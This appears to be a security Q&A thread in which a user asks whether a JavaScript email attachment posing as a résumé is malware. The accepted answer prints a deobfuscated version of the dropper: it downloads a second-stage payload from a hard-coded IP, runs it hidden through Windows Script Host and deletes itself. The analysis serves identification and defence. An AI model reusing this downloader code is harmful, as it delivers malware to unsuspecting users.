# Is this a Javascript virus?

Tags: malware, javascript, virus

So I got a random email saying this. Looks very automated:

> "How are things? 
>   I was visting your website on 4/9/2016 and I'm very interested. 
>   I'm currently looking for work either full time or as a intern to get experience in the field. 
>   Please review my Resume and let me know what you think.

Then a javascript file attached. I [scanned it on VirusTotal](https://www.virustotal.com/en/file/9e469475539ea7f6584347b9b12f55fc0931bfd627a739446b87624fa391684c/analysis/1460269327/) finding only 1/55. I have opened the file to look at the text and have copy pasted it into [this dump file](http://pastebin.com/tcW2MDtn) as it is quite long.

Anyone familiar with javascript can confirm that it is a virus or not?

Comment: Why is it blocking you from viewing it? Maybe this works: http://pastebin.com/tcW2MDtn
Also, if it isn't a virus. What is the purpose of sending this?

Comment: Line 331 is "var asupcI = new ActiveXObject(yLoJo);". This means it calls ActiveX. Because of this, I would say this malicious, without a doubt. Unless of course, ActiveXObject itself is obfuscated to do something else. But it certainly seems suspicious. https://reverseengineering.stackexchange.com/questions/4561/how-to-deobfuscate-an-obfuscated-javascript-file-like-this may help more, as well.

Comment: I only use chrome, I don't even know when the last time was that I used IE so thats a good thing. I appreciate your help in reassuring me. I'd like to reward you the answer to the topic but you only commented. Feel free to post an answer and I'll pick it. Thanks!

Answer (score 10, accepted):

It most certainly is malware. It uses JavaScript with ActiveX<sup>*</sup> and VBScript to download and execute a stage two payload that does something else. Although it is written in JavaScript, it is not executed in the browser. Instead, it is executed in the Windows Script Host when it is double-clicked. This is the deobfuscated and abridged version of the function `zQlMdib` from the file:

```
// download and execute stage 2 payload
function stage1_payload() {
    // connect to server hosting stage 2 payload and download into memory
    var http_obj = new ActiveXObject("MSXML2.XMLHTTP");
    http_obj['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
    http_obj['send']();

    // evaluates true only if http connection succeeded
    if (http_obj['Status'] == 200) {
        // open activex objects for filesystem and file access
        var fs_obj = new ActiveXObject("Scripting.FileSystemObject");
        var file_obj = new ActiveXObject("ADODB.Stream");

        // create and open temporary file (as binary) in system temporary folder
        var temp_file = fs_obj['GetSpecialFolder'](2) + '\' + fs_obj['GetTempName']();
        file_obj['Open']();
        file_obj['Type'] = 1;

        // save response body containing stage 2 payload to temporary file
        file_obj['Write'](http_obj['ResponseBody']);
        file_obj['Position'] = 0;
        file_obj['SaveToFile'](temp_file);
        file_obj['Close']();

        // execute temporary file using command prompt
        var shell_obj = new ActiveXObject("WScript.Shell");
        shell_obj['run']('cmd.exe /c ' + temp_file, 0);
    }

    // delete currently-executing script (the js file you received)
    var script_name = WScript['ScriptFullName'];
    fs_obj['deleteFile'](script_name);
}
```

<sub>* Even if your browser doesn't support ActiveX, this file executes in the Windows Script Host, which does support it.</sub>

Comment: I figured out that I got infected with the Cerber virus.
Here is a link explaining what it is: http://www.virusresearch.org/remove-cerber-decrypt-files-ransomware/

Comment: I got three files "#DECRYPT MY FILES#.txt, #DECRYPT MY FILES#.html and #DECRYPT MY FILES#.vbs." in every folder of my computer.

Comment: Honestly, I think that infection is unrelated. Not only does your browser not support ActiveX, which is required for that exploit to work, but the payload itself has nothing to do with the Cerber virus.

Comment: the infection is 100% related IMO. The cerber virus  is typically sent from spam messages, especially from russian forums. The email had a .ru extension. This happened immediately after the openning of the javascript. Additionally cerber virus is inserted using Internet Explorer. I'm 100% certain that it is related. I'll just make a clean new install of windows as everything is encrypted.

Comment: Well, did you use Internet Explorer? I thought you said you did not. If you do, then yeah that totally makes sense.

Comment: I did not use internet explorer. But you can't tell me that after downloading a program and then getting a virus, that the program has nothing to do with the virus... Especially when the source of the program is the most common form of distribution of that exact virus I received. "Russian spam email"

Comment: Unless you got some extra javascript which you did not post here (which is very well possible, it may have used multiple exploits and you only saw one), then it cannot possibly be the source of infection. This javascript uses ActiveX and ActiveX alone. Chrome does not have ActiveX.

Comment: @forest he could've downloaded the .js file and accidentally double-clicked it which would open it in Windows Script Host, which is not sandboxed and has ActiveX.

Comment: @AndréBorie You're probably correct. The `WScript` function implies that it was executed directly.

Answer (score 1):

Yes, It looks like a malicious code. This type of code is not allowed in the context of browsers. Moreover, the code is more or less, compatible with Microsoft Internet Explorer and Microsoft Windows Operating System, as other browsers doesn't support ActiveX technology of Microsoft.